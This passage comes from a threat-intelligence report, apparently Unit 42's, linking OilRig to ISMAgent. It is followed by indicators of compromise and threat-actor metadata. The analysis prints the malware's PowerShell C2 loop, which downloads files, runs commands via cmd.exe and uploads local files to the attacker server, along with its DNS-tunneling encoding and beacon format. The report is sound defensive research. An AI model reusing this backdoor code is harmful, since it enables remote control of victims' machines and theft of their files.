The “doIt” function also shows that the C2 server responds with data structured the same way as for ISMAgent, using “#” as a delimiter and fixed offsets: offset 0 holds the GUID used in subsequent requests to the C2, offset 2 a URL to download a file from, offset 3 a command to execute using the command prompt, and offset 4 a path to a file to upload to the C2 server.\r\nfunction doIt(){\r\n  try{\r\n   while($true){\r\n    # beacon: GET /action2/<id>; the reply is the '#'-delimited command string\r\n    $res = get($ha+\"/action2/\"+$id)\r\n    $p = $res.split('#')\r\n    if ($p.Length -lt 5) { break }\r\n    # offset 0 (the GUID) names the run log and the /response/ URL\r\n    $res = $tmp+$p[0]\r\n    $u = $ha+\"/response/\"+$id+\"/\"+$p[0]\r\n    # offset 2: URL to download into the temp directory\r\n    if ($p[2] -ne '') {\r\n     $name= $p[2].SubString($p[2].LastIndexOf(\"/\")+1)\r\n     download $p[2] ($tmp+$name)\r\n     [IO.File]::WriteAllText($res,\"done\", [System.Text.Encoding]::Unicode)\r\n    }\r\n    # offset 3: command run through cmd.exe, output appended to the run log\r\n    if($p[3] -ne ''){\r\n     $p[3] | cmd.exe >> $res\r\n    }\r\n    # offset 4: local file to exfiltrate via /upload/\r\n    if($p[4] -ne ''){\r\n     upload $u.Replace(\"/response/\",\"/upload/\") $p[4]\r\n    }\r\n    upload $u $res\r\n    [IO.File]::Delete($res)\r\n   }\r\n  } catch {}\r\n}\r\nFigure 7 The 'doIt' function within the PowerShell script handles C2 interaction and functionality\r\nThe commonalities between this PowerShell script and ISMAgent do not stop there. The HTTP requests to the C2 server use the exact same URL structure. 
For instance, the payload generates a URL using the following line of code, which results in a base64 encoded string that contains [hostname/username]:\r\n$id=[Convert]::ToBase64String($Enc.GetBytes([System.Net.Dns]::GetHostEntry([string]\"localhost\").HostName+\"/\"+$env:username)).Replace('=','%3\r\nAlso, as seen in the code above, the PowerShell script makes sure the base64 encoded data is safe to use in an HTTP URL by replacing the “=”, “/” and “+” characters with their hexadecimal equivalents. The ISMAgent payloads perform the exact same replacement, as seen in the portion of code in Figure 8.\r\nFigure 8 Code within the ISMAgent payload that overlaps the character replacement in the HTTP communications functionality within the PowerShell script\r\nThe DNS tunneling protocol within the PowerShell script is the same as that of the ISMAgent payload, which can be seen in the following beacon sent from the PowerShell script:\r\nn.n.c.55957d20569c43c9a401e5d446b92b9e.mslicensecheck.com\r\nTo facilitate the DNS tunneling functionality, the PowerShell script likewise replaces the “=”, “/” and “+” characters within the base64 data sent to the C2 server within the subdomains of DNS queries. 
However, DNS names cannot include the “%” character, so it uses the following line of code to replace them with “-”, “-s-” and “-p-” instead:\r\n$b64=[Convert]::ToBase64String($dt).Replace('=','-').Replace(\"/\",\"-s-\").Replace(\"+\",\"-p-\")\r\nThis functionality is again replicated within the ISMAgent payload for its DNS tunneling functionality, as shown in Figure 9.\r\nFigure 9 Code within the ISMAgent payload that overlaps the character replacement within the DNS tunneling functionality of the PowerShell script\r\nConclusion\r\nThe OilRig campaign has repeatedly demonstrated a willingness and desire to iterate on its toolset while maintaining some level of similarity over time. In this scenario, we were able to directly observe this type of behavior, while also observing the group adopt a tool previously thought to be unrelated to OilRig. With the inclusion of ISMAgent within the OilRig toolset, we are beginning to see stronger relationships between the various documented groups operating in the Middle East. This region has proven to be a hotbed of espionage-motivated activity over the last couple of years, and there appear to be no signs of this changing. 
As our research continues, our goal is to build an even better understanding of the true extent of the various operations in this region and the relationships between them.\r\nPalo Alto Networks customers are protected and may learn more via the following:\r\nSamples are classified as malicious by WildFire and Traps prevents their execution\r\nDomains and IPs have been classified as malicious and IPS signatures generated\r\nAutoFocus users may learn more via the ISMAgent and Clayslide tags\r\nIndicators of Compromise\r\nClayslide delivering ISMAgent\r\n3eb14b6705179590f0476d3d3cbd71665e7c1935ecac3df7b876edc9bd7641b6\r\n5ac939a5426db8614165bd8b6a02d3e8d9f167379c6ed28025bf3b37f1aea902\r\nISMAgent payloads\r\nbbfc05177e5e29b3c8c4ef0148969d07e6239140da5bff57473c32409e76c070\r\n52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9\r\naf4d8604d0cd09b8dc01dbafc33c6d240d356cad366f9917192a2725e0121a0d\r\nISMAgent C2\r\nadobeproduct[.]com\r\nntpupdateserver[.]com\r\nmicrosoft-publisher[.]com\r\nRelated infrastructure\r\nmiedafire[.]com\r\ntatavpnservices[.]com\r\nchrome-dns[.]com\r\nfireeyeupdate[.]com\r\ncache-service[.]net\r\nlevel3-resolvers[.]net\r\nmslicensecheck[.]com\r\nSource: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/"
	],
	"report_names": [
		"unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group"
	],
	"threat_actors": [
		{
			"id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed",
			"created_at": "2022-10-25T16:07:23.918534Z",
			"updated_at": "2026-04-10T02:00:04.789509Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [
				"Greenbug",
				"Volatile Kitten"
			],
			"source_name": "ETDA:Greenbug",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "25896473-161f-411f-b76a-f11bb26c96bd",
			"created_at": "2023-01-06T13:46:38.75749Z",
			"updated_at": "2026-04-10T02:00:03.090307Z",
			"deleted_at": null,
			"main_name": "CHRYSENE",
			"aliases": [
				"Greenbug"
			],
			"source_name": "MISPGALAXY:CHRYSENE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bba8e81-73af-4010-86dc-d43c408ca342",
			"created_at": "2023-01-06T13:46:38.553459Z",
			"updated_at": "2026-04-10T02:00:03.021597Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [],
			"source_name": "MISPGALAXY:Greenbug",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434736,
	"ts_updated_at": 1775826790,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/855088aa14275eb4898176957ec27fe16012255c.pdf",
		"text": "https://archive.orkl.eu/855088aa14275eb4898176957ec27fe16012255c.txt",
		"img": "https://archive.orkl.eu/855088aa14275eb4898176957ec27fe16012255c.jpg"
	}
}